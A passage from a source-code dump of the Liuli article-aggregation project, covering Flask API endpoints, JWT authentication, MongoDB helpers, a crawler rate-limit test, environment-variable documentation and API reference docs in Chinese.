src.databases.mongodb_base import MongodbManager 12 | from src.databases.mongodb_tools import mongodb_update_data 13 | from src.utils.log import LOGGER 14 | 15 | 16 | def load_data_to_articlles(input_data: dict): 17 | """ 18 | 将获取的文章数据并持久化到 liuli_articles 19 | """ 20 | # 抓取状态 21 | flag = False 22 | doc_source_name = input_data.get("doc_source_name") 23 | doc_source = input_data.get("doc_source") 24 | doc_name = input_data.get("doc_name") 25 | 26 | copy_input_data = deepcopy(input_data) 27 | copy_input_data["doc_ts"] = int(copy_input_data.get("doc_ts", int(time.time()))) 28 | if doc_source_name and doc_source and doc_name: 29 | # 抓取成功进行持久化 30 | mongo_base = MongodbManager.get_mongo_base( 31 | mongodb_config=Config.LL_MONGODB_CONFIG 32 | ) 33 | coll_conn = mongo_base.get_collection(coll_name="liuli_articles") 34 | filter_dict = {"doc_id": copy_input_data["doc_id"]} 35 | update_data = {"$set": copy_input_data} 36 | db_res = mongodb_update_data( 37 | coll_conn=coll_conn, 38 | filter_dict=filter_dict, 39 | update_data=update_data, 40 | upsert=True, 41 | ) 42 | if db_res["status"]: 43 | msg = f"来自 {doc_source} 的文章持久化成功! 👉 {doc_source_name}: {doc_name} " 44 | flag = True 45 | else: 46 | msg = f"来自 {doc_source} 的文章持久化失败! 👉 {doc_source_name} {db_res['info']}" 47 | else: 48 | msg = f"来自 {doc_source} 的文章抓取失败! 👉 {doc_source}/{doc_source_name}/{doc_name} " 49 | LOGGER.info(msg) 50 | return flag 51 | -------------------------------------------------------------------------------- /src/api/common/mid_decorator.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-04-12. 3 | Description: 验证装饰器中间件 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | 8 | from functools import wraps 9 | 10 | from flask import current_app, request 11 | from flask_jwt_extended import get_jwt_identity, verify_jwt_in_request 12 | 13 | from src.api.common.flask_tools import response_handle 14 | from src.api.common.response_base import UniResponse 15 | from src.config import Config 16 | 17 | 18 | def jwt_required(): 19 | """JWT校验装饰器""" 20 | 21 | def wrapper(fn): 22 | @wraps(fn) 23 | def decorator(*args, **kwargs): 24 | if request.method == "POST": 25 | # 判断是否是浏览器访问 26 | if "L-X-Token" in request.headers.keys() and "/api/bm" in request.path: 27 | ll_x_token = request.headers["L-X-Token"] 28 | if ll_x_token == Config.LL_X_TOKEN: 29 | resp = fn(*args, **kwargs) 30 | else: 31 | resp = return_401() 32 | else: 33 | post_data: dict = request.json 34 | username = post_data.get("username") 35 | # 返回 401 就是验证错误 36 | verify_jwt_in_request() 37 | 38 | if get_jwt_identity() == username: 39 | resp = fn(*args, **kwargs) 40 | else: 41 | resp = return_401() 42 | else: 43 | resp = return_401() 44 | return resp 45 | 46 | return decorator 47 | 48 | return wrapper 49 | 50 | 51 | def return_401(): 52 | """ 53 | 返回401 54 | """ 55 | return response_handle( 56 | request=request, 57 | dict_value=UniResponse.NOT_AUTHORIZED, 58 | status=401, 59 | ) 60 | -------------------------------------------------------------------------------- /src/api/views/bp_rss.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021-12-27. 3 | Description: liuli RSS 接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import Blueprint, current_app 8 | 9 | from src.databases.mongodb_base import MongodbBase 10 | from src.databases.mongodb_tools import mongodb_find 11 | 12 | bp_rss = Blueprint("rss", __name__, url_prefix="/rss") 13 | 14 | 15 | @bp_rss.route("///", methods=["GET"], strict_slashes=False) 16 | def rss(doc_source, doc_source_name): 17 | """RSS文章获取接口 18 | http://127.0.0.1:8765/rss/liuli_wechat/老胡的储物柜/ 19 | Args: 20 | doc_source ([type]): 文章来源 21 | doc_source_name ([type]): 文章来源作者 22 | 23 | Returns: 24 | [type]: Flask Response 25 | """ 26 | # 获取基本配置 27 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 28 | logger = current_app.config["app_logger"] 29 | 30 | # 获取变量 31 | file_path = f"{doc_source}/{doc_source_name}" 32 | coll_conn = mongodb_base.get_collection(coll_name="liuli_rss") 33 | filter_dict = { 34 | "doc_source": doc_source, 35 | "doc_source_name": doc_source_name, 36 | } 37 | db_res = mongodb_find( 38 | coll_conn=coll_conn, filter_dict=filter_dict, return_dict={"_id": 0}, limit=1 39 | ) 40 | db_satus, db_info = db_res["status"], db_res["info"] 41 | rss_data = "" 42 | if db_satus: 43 | # 查询成功 44 | if db_info: 45 | # 存在 46 | rss_data = db_info[0]["rss_data"] 47 | else: 48 | # 不存在 rss 49 | msg = f"{file_path} 不存在,请先录入!" 50 | logger.error(msg) 51 | else: 52 | # 查询失败 53 | msg = f"{file_path} 查询失败!" 54 | logger.error(msg) 55 | 56 | return ( 57 | rss_data, 58 | 200, 59 | {"Content-Type": "text/xml; charset=utf-8"}, 60 | ) 61 | -------------------------------------------------------------------------------- /tests/test_data258.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-06-05. 3 | Description: data258 测试脚本 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | 8 | import time 9 | 10 | import requests 11 | 12 | from src.collector.wechat.data258_ruia_start import exec_js_data258 13 | 14 | url = "https://mp.data258.com/wx?id=d3da5e051e7ae38315c8b99556726ced&t=5lk2PVxxwiA6EiUu8BKRdIewSaV8EJYhM8Byk5aGuhEkvJCU5cQkCkmWf12foajABRhpSlDRTS6qmv63gw%3D%3D" 15 | 16 | 17 | headers = { 18 | "Host": "mp.data258.com", 19 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", 20 | "Referer": "https://mp.data258.com/article/category/howie_locker", 21 | } 22 | 23 | 24 | def get_proxy(flag: bool = False): 25 | """ 26 | get random proxy from proxypool 27 | :return: proxy 28 | """ 29 | if flag: 30 | proxy = "" 31 | proxies = { 32 | "http": f"{proxy}", 33 | "https": f"{proxy}", 34 | } 35 | else: 36 | proxies = None 37 | 38 | return proxies 39 | 40 | 41 | def test_times(): 42 | """反爬措施测试""" 43 | res = None 44 | try: 45 | proxies = get_proxy() 46 | print("get random proxy", proxies) 47 | resp = requests.get(url=url, headers=headers, proxies=proxies) 48 | html = resp.text 49 | if len(str(html)) > 100: 50 | res = exec_js_data258(html=html) 51 | 52 | except Exception as e: 53 | print(f"抓取失败! {e}") 54 | 55 | return res 56 | 57 | 58 | if __name__ == "__main__": 59 | # while True: 60 | # res = test_times() 61 | # time.sleep(2) 62 | # print(res) 63 | nums = 0 64 | while True: 65 | res = test_times() 66 | time.sleep(2) 67 | print(res) 68 | if res: 69 | nums += 1 70 | else: 71 | break 72 | print(f"单IP上限次数:{nums}") 73 | -------------------------------------------------------------------------------- /docs/02.环境变量.md: -------------------------------------------------------------------------------- 1 | # 环境变量 2 | 3 | `Liuli`项目环境变量说明: 4 | 5 | ```shell 6 | # ======================================系统环境配置======================================# 7 | # 当前目录为模块 8 | PYTHONPATH=${PYTHONPATH}:${PWD} 9 | 10 | # =======================================数据库配置=======================================# 11 | # MongoDB 用户名 12 | LL_M_USER="" 13 | # MongoDB 密码 14 | LL_M_PASS="" 15 | # MongoDB IP 16 | # Docker Compose 形式启动的话,此行配置不变 17 | LL_M_HOST="liuli_mongodb" 18 | # MongoDB 端口 19 | LL_M_PORT="27017" 20 | # MongoDB 默认 db 21 | # 如果用户自建db,填写自己的即可 此时 LL_M_OP_DB 可不填 22 | LL_M_DB="admin" 23 | LL_M_OP_DB="liuli" 24 | 25 | # ======================================接口服务配置======================================# 26 | # Flask 是否开启Flask的Debug模式 27 | LL_HTTP_DEBUG=0 28 | # Flask IP 29 | LL_HTTP_HOST="0.0.0.0" 30 | # Flask 端口 31 | LL_HTTP_PORT=8765 32 | # 访问域名,没有域名填本机实际地址(因为要开放对外访问),如: http://192.168.0.1:8765 33 | LL_DOMAIN="" 34 | # Flask 服务启动的 worker 数量 35 | LL_HTTP_WORKERS=1 36 | 37 | # =======================================分发器配置=======================================# 38 | # 分发器终端配置,用户在环境变量配置好密钥后,在启动配置的 sender.sender_list 填写好想分发的终端即可 39 | # 目前支持:ding[钉钉] wecom[企业微信] tg[Telegram] Bark 40 | # 分发终端为钉钉必须配置的Token 41 | LL_DD_TOKEN="" 42 | # 分发终端为企业微信的配置,如果不配置分发用户与部门,则默认会发送给所有部门的所有用户 43 | LL_WECOM_ID="" 44 | LL_WECOM_AGENT_ID="-1" 45 | LL_WECOM_SECRET="" 46 | # 企业微信分发用户(填写用户帐号,不区分大小写),多个用户用;分割 47 | LL_WECOM_TO_USER="" 48 | # 企业微信分发部门(填写部门名称),多个部门用;分割 49 | LL_WECOM_PARTY="" 50 | # TG 终端配置 51 | LL_TG_CHAT_ID="" 52 | LL_TG_TOKEN="" 53 | # Bark推送链接 54 | LL_BARK_URL="" 55 | 56 | # =======================================备份器配置=======================================# 57 | # 备份器目前支持: github mongodb 58 | # 使用 mongodb 备份的话则默认使用上面配置的数据库地址进行备份 59 | # 使用 github 备份的话需要填写以下配置 60 | # 项目权限token 61 | LL_GITHUB_TOKEN="" 62 | # 文章保存项目地址,例:howie6879/liuli_backup 项目名称一定为 liuli_backup 63 | LL_GITHUB_REPO="" 64 | # 访问域名,可自定义也可以用默认的,如果用github做备份器就必填,以我个人备份项目为例地址为:https://howie6879.github.io/liuli_backup/ 65 | LL_GITHUB_DOMAIN="" 66 | ``` 67 | 68 | -------------------------------------------------------------------------------- /src/processor/html_render/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-02-09. 3 | Description: 将常用文章渲染成html 4 | - 命令: PIPENV_DOTENV_LOCATION=./pro.env pipenv run python src/processor/html_render/__init__.py 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | import os 8 | 9 | from string import Template 10 | 11 | from src.config import Config 12 | 13 | 14 | def render_book_html( 15 | doc_source_name: str, doc_name: str, doc_content: str, theme: str = "book_owllook" 16 | ) -> str: 17 | """将抓取的元数据渲染成html 18 | 19 | Args: 20 | doc_source_name (str): 书籍名称 21 | doc_name (str): 书籍当前章节 22 | doc_content (str): 书籍当前内容 23 | theme (str): 渲染主题 24 | Returns: 25 | str: html 26 | """ 27 | book_tmpl_path = os.path.join(Config.PROC_HTML_TMPL_DIR, f"{theme}.tmpl") 28 | with open(book_tmpl_path, "rb") as fp: 29 | raw = fp.read().decode("utf8") 30 | render_dict = { 31 | "html_title": f"{doc_source_name}-{doc_name}", 32 | "article_title": doc_name, 33 | "article_content": doc_content, 34 | } 35 | raw_html = Template(raw).substitute(render_dict) 36 | return raw_html 37 | 38 | 39 | if __name__ == "__main__": 40 | s_data = { 41 | "doc_id": "13611259dd2caf25ebdec506c11032ba", 42 | "doc_author": "", 43 | "doc_core_html": "w", 44 | "doc_date": "", 45 | "doc_des": "", 46 | "doc_image": "", 47 | "doc_keywords": "梅丽莎 小女孩 起来 阳光 模仿 出来 棺材 记起 醒来 姑姑 疑惑 看见 缝隙 仪式 盖子 神情 前些年 希望 选择 时代", 48 | "doc_link": "https://www.yruan.com/article/38563/28963588.html", 49 | "doc_name": "第四十一章 新的旅程", 50 | "doc_source": "liuli_book", 51 | "doc_source_account_intro": "", 52 | "doc_source_account_nick": "", 53 | "doc_source_meta_list": [], 54 | "doc_source_name": "诡秘之主", 55 | "doc_ts": 1644376985, 56 | "doc_type": "article", 57 | } 58 | r_raw_html = render_book_html("诡秘之主", "第四十一章 新的旅程", "") 59 | print(r_raw_html) 60 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by .ignore support plugin (hsz.mobi) 2 | ### Python template 3 | # Byte-compiled / optimized / DLL files 4 | __pycache__/ 5 | *.py[cod] 6 | *$py.class 7 | 8 | # C extensions 9 | *.so 10 | 11 | # Distribution / packaging 12 | .Python 13 | build/ 14 | develop-eggs/ 15 | dist/ 16 | downloads/ 17 | eggs/ 18 | .eggs/ 19 | lib/ 20 | lib64/ 21 | parts/ 22 | sdist/ 23 | var/ 24 | wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | .hypothesis/ 50 | .pytest_cache/ 51 | 52 | # Translations 53 | *.mo 54 | *.pot 55 | 56 | # Django stuff: 57 | *.log 58 | local_settings.py 59 | db.sqlite3 60 | 61 | # Flask stuff: 62 | instance/ 63 | .webassets-cache 64 | 65 | # Scrapy stuff: 66 | .scrapy 67 | 68 | # Sphinx documentation 69 | docs/_build/ 70 | 71 | # PyBuilder 72 | target/ 73 | 74 | # Jupyter Notebook 75 | .ipynb_checkpoints 76 | 77 | # pyenv 78 | .python-version 79 | 80 | # celery beat schedule file 81 | celerybeat-schedule 82 | 83 | # SageMath parsed files 84 | *.sage.py 85 | 86 | # Environments 87 | .venv 88 | env/ 89 | venv/ 90 | ENV/ 91 | env.bak/ 92 | venv.bak/ 93 | 94 | # Spyder project settings 95 | .spyderproject 96 | .spyproject 97 | 98 | # Rope project settings 99 | .ropeproject 100 | 101 | # mkdocs documentation 102 | /site 103 | 104 | # mypy 105 | .mypy_cache/ 106 | .idea/ 107 | .DS_Store 108 | pro.env 109 | pro_online.env 110 | online.env 111 | dev.env 112 | *.swp 113 | *.bak 114 | logs/ 115 | *.out 116 | *.xml 117 | *.h5 118 | node_modules 119 | 120 | # db 121 | *.mongodb -------------------------------------------------------------------------------- /src/api/views/api/articles/get.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-05. 3 | Description: 根据 doc_id 获取详情 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.databases import MongodbBase, mongodb_find 18 | from src.utils.tools import text_decompress 19 | 20 | 21 | @jwt_required() 22 | def articles_get(): 23 | """根据 doc_id 获取详情 24 | eg: 25 | { 26 | "username": "liuli", 27 | "doc_id": "" 28 | } 29 | Returns: 30 | Response: 响应类 31 | """ 32 | # 获取基本配置 33 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 34 | app_logger = current_app.config["app_logger"] 35 | coll = mongodb_base.get_collection(coll_name="liuli_articles") 36 | # 获取基础数据 37 | post_data: dict = request.json 38 | doc_id = post_data.get("doc_id", "") 39 | 40 | db_res = mongodb_find( 41 | coll_conn=coll, filter_dict={"doc_id": doc_id}, return_dict={"_id": 0}, limit=1 42 | ) 43 | db_info = db_res["info"] 44 | if db_res["status"]: 45 | if db_info: 46 | final_data = db_info[0] 47 | final_data["doc_core_html"] = text_decompress(final_data["doc_core_html"]) 48 | result = { 49 | ResponseField.DATA: final_data, 50 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 51 | ResponseField.STATUS: ResponseCode.SUCCESS, 52 | } 53 | else: 54 | result = { 55 | ResponseField.DATA: {}, 56 | ResponseField.MESSAGE: ResponseReply.GET_DOC_EMPTY, 57 | ResponseField.STATUS: ResponseCode.GET_DOC_EMPTY, 58 | } 59 | 60 | else: 61 | result = UniResponse.DB_ERR 62 | err_info = f"get doc failed! DB response info -> {db_info}" 63 | app_logger.error(err_info) 64 | return response_handle(request=request, dict_value=result) 65 | -------------------------------------------------------------------------------- /tests/html_demo/wechat_demo.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 老胡的储物柜 27 | 28 | 29 | 30 | 微信号 31 | howie_locker 32 | 33 | 34 | 35 | 功能介绍 36 | 编程、兴趣、生活 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /src/common/db_utils.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-01-25. 3 | Description: 常用的DB业务操作函数 4 | 执行: PIPENV_DOTENV_LOCATION=./pro.env pipenv run python src/common/db_utils.py 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | from src.config import LOGGER, Config 8 | from src.databases import MongodbManager, mongodb_find 9 | 10 | MONGODB_BASE = MongodbManager.get_mongo_base(mongodb_config=Config.LL_MONGODB_CONFIG) 11 | 12 | 13 | def get_liuli_config() -> dict: 14 | """ 15 | 从 liuli_config 获取配置 16 | """ 17 | coll = MONGODB_BASE.get_collection(coll_name="liuli_config") 18 | db_res: dict = mongodb_find( 19 | coll_conn=coll, 20 | filter_dict={"config_flag": "liuli"}, 21 | return_dict={"LL_JWT_SECRET_KEY": 0, "config_flag": 0, "_id": 0}, 22 | ) 23 | if db_res["status"]: 24 | result = db_res["info"][0] if db_res["info"] else {} 25 | else: 26 | result = {} 27 | LOGGER.error(f"获取 Liuli 配置失败,请检查数据库配置!{db_res['info']}") 28 | return result 29 | 30 | 31 | def get_doc_source_list() -> list: 32 | """ 33 | 从 liuli_articles 获取所有 doc_source 组成的列表 34 | """ 35 | coll_conn = MONGODB_BASE.get_collection(coll_name="liuli_articles") 36 | return coll_conn.distinct("doc_source") or [] 37 | 38 | 39 | def get_doc_source_name_dict(doc_source_list: list = None) -> dict: 40 | """获取 doc_source 下的 doc_source_name 组成的字典 41 | 42 | Args: 43 | doc_source_list (list, optional): [description]. Defaults to []. 44 | 45 | Returns: 46 | dict: doc_source_name 字典 47 | """ 48 | doc_source_list = doc_source_list or get_doc_source_list() 49 | doc_source_name_dict = {} 50 | if doc_source_list: 51 | coll_conn = MONGODB_BASE.get_collection(coll_name="liuli_articles") 52 | for doc_source in doc_source_list: 53 | each_res = coll_conn.distinct("doc_source_name", {"doc_source": doc_source}) 54 | doc_source_name_dict[doc_source] = each_res 55 | return doc_source_name_dict 56 | 57 | 58 | if __name__ == "__main__": 59 | res = get_doc_source_name_dict() 60 | print(res) 61 | -------------------------------------------------------------------------------- /src/api/views/bp_backup.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021-12-27. 3 | Description: liuli backup html 接口 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import Blueprint, current_app 8 | 9 | from src.databases.mongodb_base import MongodbBase 10 | from src.databases.mongodb_tools import mongodb_find 11 | from src.utils.tools import text_decompress 12 | 13 | bp_backup = Blueprint("backup", __name__, url_prefix="/backup") 14 | 15 | 16 | @bp_backup.route( 17 | "///", 18 | methods=["GET"], 19 | strict_slashes=False, 20 | ) 21 | def backup(doc_source, doc_source_name, doc_name): 22 | """备份文章获取接口 23 | http://127.0.0.1:8765/backup/liuli_wechat/老胡的周刊(第089期) 24 | Args: 25 | doc_source ([type]): 文章来源 26 | doc_source_name ([type]): 文章来源作者 27 | doc_name ([type]): 文章名称 28 | 29 | Returns: 30 | [type]: Flask Response 31 | """ 32 | # 获取基本配置 33 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 34 | logger = current_app.config["app_logger"] 35 | 36 | # 获取变量 37 | file_path = f"{doc_source}/{doc_source_name}/{doc_name}" 38 | coll_conn = mongodb_base.get_collection(coll_name="liuli_backup") 39 | filter_dict = { 40 | "doc_source": doc_source, 41 | "doc_source_name": doc_source_name, 42 | "doc_name": doc_name, 43 | } 44 | db_res = mongodb_find( 45 | coll_conn=coll_conn, 46 | filter_dict=filter_dict, 47 | return_dict={"_id": 0}, 48 | limit=1, 49 | ) 50 | db_satus, db_info = db_res["status"], db_res["info"] 51 | content = "" 52 | if db_satus: 53 | # 查询成功 54 | if db_info: 55 | # 存在 56 | content = db_info[0]["content"] 57 | else: 58 | # 不存在 rss 59 | content = f"文章 {file_path} 不存在,请先进行备份!" 60 | logger.error(content) 61 | else: 62 | # 查询失败 63 | content = f"{file_path} 查询失败!" 64 | logger.error(content) 65 | 66 | return ( 67 | text_decompress(content), 68 | 200, 69 | {"Content-Type": "text/html; charset=utf-8"}, 70 | ) 71 | -------------------------------------------------------------------------------- /src/api/views/api/doc_source/get.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 获取 doc_source 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | 8 | from flask import current_app, request 9 | 10 | from src.api.common import ( 11 | ResponseCode, 12 | ResponseField, 13 | ResponseReply, 14 | UniResponse, 15 | jwt_required, 16 | response_handle, 17 | ) 18 | from src.databases import MongodbBase, mongodb_find 19 | 20 | 21 | @jwt_required() 22 | def doc_source_get(): 23 | """获取 doc_source 24 | eg: 25 | { 26 | "username": "liuli", 27 | "doc_source": "wechat" 28 | } 29 | Returns: 30 | Response: 响应类 31 | """ 32 | # 获取基本配置 33 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 34 | app_logger = current_app.config["app_logger"] 35 | coll = mongodb_base.get_collection(coll_name="liuli_doc_source") 36 | # 获取基础数据 37 | post_data: dict = request.json 38 | doc_source = post_data.get("doc_source", "") 39 | username = post_data.get("username", "") 40 | filter_dict = {"username": username} 41 | if doc_source: 42 | filter_dict["doc_source"] = doc_source 43 | db_res = mongodb_find( 44 | coll_conn=coll, 45 | filter_dict=filter_dict, 46 | return_dict={"_id": 0}, 47 | sorted_list=[("doc_source", -1)], 48 | ) 49 | db_info = db_res["info"] 50 | if db_res["status"]: 51 | if db_info: 52 | result = { 53 | ResponseField.DATA: db_info, 54 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 55 | ResponseField.STATUS: ResponseCode.SUCCESS, 56 | } 57 | else: 58 | result = { 59 | ResponseField.DATA: "", 60 | ResponseField.MESSAGE: ResponseReply.GET_DC_EMPTY, 61 | ResponseField.STATUS: ResponseCode.GET_DC_EMPTY, 62 | } 63 | 64 | else: 65 | result = UniResponse.DB_ERR 66 | err_info = f"get doc source config failed! DB response info -> {db_info}" 67 | app_logger.error(err_info) 68 | return response_handle(request=request, dict_value=result) 69 | -------------------------------------------------------------------------------- /docs/接口文档/00.通用说明.md: -------------------------------------------------------------------------------- 1 | ## 注意事项 2 | 3 | - 发起HTTP-POST请求请在Header头加上如下字段: 4 | - `Content-Type: application/json` 5 | - 接口完整 URL 为:接入地址/api/接口地址: http://0.0.0.0:8765/api/user/login 6 | 7 | ## 状态码 8 | 9 | | 状态码 | 名称 | 说明 | 10 | | ------ | --------------------- | ------------------------ | 11 | | 200 | SUCCESS | OK | 12 | | 400 | BAD_REQUEST | 错误请求 | 13 | | 401 | NOT_AUTHORIZED | 验证未通过 | 14 | | 500 | SERVER_ERR | 服务异常 | 15 | | 901 | USER_LOGIN_ERROR | 用户登录失败 | 16 | | 902 | USER_CHANGE_PWD_ERROR | 用户修改密码失败 | 17 | | 903 | GEN_RSS_FAILED | RSS 生成失败 | 18 | | 904 | GEN_BACKUP_FAILED | BACKUP 生成失败 | 19 | | 905 | GET_DC_EMPTY | 获取不到 doc_source 配置 | 20 | 21 | 22 | ## 通用参数 23 | 24 | ### 请求Header头 25 | 26 | | 参数名 | 参数类型 | 描述 | 是否必填 | 27 | | ------------- | -------- | ------------------ | -------- | 28 | | Content-Type | string | application/json | T | 29 | | Authorization | string | 需要校验的接口必填 | F | 30 | 31 | ### 通用返回参数 32 | 33 | | 字段名 | 类型 | 描述 | 示例 | 34 | | ------ | ------ | -------------------------------------------------- | ------------------ | 35 | | status | int | 业务状态码,200 为正常,否则为异常 | 200 | 36 | | info | string | 业务状态描述,正常为 `ok` ,异常为业务异常具体描述 | "ok" | 37 | | data | json | 业务数据,异常为 {} | {"hello": "world"} | 38 | 39 | ### 通用响应 40 | 41 | #### 请求成功 42 | 43 | ```json 44 | { 45 | "status": 200, 46 | "info": "OK", 47 | "data": {} 48 | } 49 | ``` 50 | 51 | #### 参数错误 52 | 53 | ```json 54 | { 55 | "data": {}, 56 | "info": "参数错误!", 57 | "status": 400 58 | } 59 | ``` 60 | 61 | #### 验证失败 62 | 63 | ```json 64 | { 65 | "data": {}, 66 | "info": "验证未通过", 67 | "status": 401 68 | } 69 | ``` 70 | 71 | #### 数据库错误 72 | 73 | ```json 74 | { 75 | "data": {}, 76 | "info": "数据库操作错误", 77 | "status": 500 78 | } 79 | ``` 80 | 81 | #### 未知错误 82 | 83 | ```json 84 | { 85 | "data": {}, 86 | "info": "未知错误", 87 | "status": 500 88 | } 89 | ``` 90 | -------------------------------------------------------------------------------- /docs/接口文档/06.接口说明[utils].md: -------------------------------------------------------------------------------- 1 | ## 返回书籍目录 json 2 | 3 | ### 描述 4 | 5 | 返回书籍目录 json 6 | 7 | ### URL路径 8 | 9 | /utils/book_chapter 10 | 11 | ### 请求方式 12 | 13 | POST 14 | 15 | ### 请求参数 16 | 17 | | 参数名 | 类型 | 必选 | 描述 | 18 | | -------- | ------ | ---- | ---------- | 19 | | username | string | 是 | 用户名 | 20 | | url | string | 是 | 目录页 URL | 21 | 22 | ### 返回参数 23 | 24 | 响应返回的是接口标准的通用响应 25 | 26 | ### 请求示例 27 | 28 | ```json 29 | { 30 | "username": "liuli", 31 | "url": "https://www.yruan.com/article/38563.html" 32 | } 33 | ``` 34 | 35 | ### 返回示例 36 | 37 | #### 成功示例 38 | 39 | ```json 40 | { 41 | "data": { 42 | "chapter_list": [ 43 | { 44 | "chapter_name": "第一章 绯红", 45 | "chapter_url": "https://www.yruan.com/article/38563/4082438.html" 46 | } 47 | ], 48 | "url": "https://www.yruan.com/article/38563.html" 49 | }, 50 | "info": "ok", 51 | "status": 200 52 | } 53 | ``` 54 | 55 | #### 失败示例 56 | 57 | ```json 58 | { 59 | "data": {}, 60 | "info": "验证未通过", 61 | "status": 401 62 | } 63 | 64 | { 65 | "data": {}, 66 | "info": "参数错误!", 67 | "status": 400 68 | } 69 | ``` 70 | 71 | ## 章节内容提取 72 | 73 | ### 描述 74 | 75 | 基于readability算法提取文章核心内容 76 | 77 | ### URL路径 78 | 79 | /utils/book_content 80 | 81 | ### 请求方式 82 | 83 | POST 84 | 85 | ### 请求参数 86 | 87 | | 参数名 | 类型 | 必选 | 描述 | 88 | | -------- | ------ | ---- | ---------- | 89 | | username | string | 是 | 用户名 | 90 | | url | string | 是 | 目录页 URL | 91 | 92 | ### 返回参数 93 | 94 | 响应返回的是接口标准的通用响应 95 | 96 | ### 请求示例 97 | 98 | ```json 99 | { 100 | "username": "liuli", 101 | "url": "https://www.yruan.com/article/38563/4082440.html" 102 | } 103 | ``` 104 | 105 | ### 返回示例 106 | 107 | #### 成功示例 108 | 109 | ```json 110 | { 111 | "data": { 112 | "core_html": "", 113 | "url": "https://www.yruan.com/article/38563/4082440.html" 114 | }, 115 | "info": "ok", 116 | "status": 200 117 | } 118 | ``` 119 | 120 | #### 失败示例 121 | 122 | ```json 123 | { 124 | "data": {}, 125 | "info": "验证未通过", 126 | "status": 401 127 | } 128 | 129 | { 130 | "data": {}, 131 | "info": "参数错误!", 132 | "status": 400 133 | } 134 | ``` 135 | -------------------------------------------------------------------------------- /src/api/views/api/config/delete.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 删除 config 字段 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from bson import ObjectId 8 | from flask import current_app, request 9 | 10 | from src.api.common import ( 11 | ResponseCode, 12 | ResponseField, 13 | ResponseReply, 14 | UniResponse, 15 | jwt_required, 16 | response_handle, 17 | ) 18 | from src.databases import MongodbBase, mongodb_update_data 19 | 20 | 21 | @jwt_required() 22 | def config_delete(): 23 | """ 24 | 删除 config 25 | eg: 26 | { 27 | "username": "liuli", 28 | "_id": "64215cca554b6d873380103a", 29 | "config_key": ["LL_DEMO", "LL_HELLO"] 30 | } 31 | """ 32 | # 获取基本配置 33 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 34 | app_logger = current_app.config["app_logger"] 35 | coll = mongodb_base.get_collection(coll_name="liuli_config") 36 | # 获取基础数据 37 | post_data: dict = request.json 38 | _id = post_data["_id"] 39 | config_key = post_data.get("config_key", []) 40 | 41 | if config_key: 42 | result = UniResponse.SUCCESS 43 | unset_dict = {} 44 | for each in config_key: 45 | unset_dict[each] = 1 46 | 47 | u_db_res: dict = mongodb_update_data( 48 | coll_conn=coll, 49 | filter_dict={"_id": ObjectId(_id)}, 50 | update_data={"$unset": unset_dict}, 51 | ) 52 | 53 | if u_db_res["status"]: 54 | result = { 55 | ResponseField.DATA: {}, 56 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 57 | ResponseField.STATUS: ResponseCode.SUCCESS, 58 | } 59 | else: 60 | result = UniResponse.DB_ERR 61 | err_info = ( 62 | f"update liuli config failed! DB response info -> {u_db_res['info']}" 63 | ) 64 | app_logger.error(err_info) 65 | else: 66 | result = UniResponse.DB_ERR 67 | err_info = "delete liuli config failed! DB response info -> config_key is not expert empty!" 68 | app_logger.error(err_info) 69 | 70 | return response_handle(request=request, dict_value=result) 71 | -------------------------------------------------------------------------------- /thunder-tests/thunderCollection.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "_id": "4218d20e-f083-4ced-b47f-14f4564c9842", 4 | "colName": "ll_api", 5 | "created": "2022-06-29T03:10:38.913Z", 6 | "sortNum": 10000, 7 | "folders": [ 8 | { 9 | "_id": "688a2b02-623a-4a57-aa2f-726355c861bc", 10 | "name": "user", 11 | "containerId": "", 12 | "created": 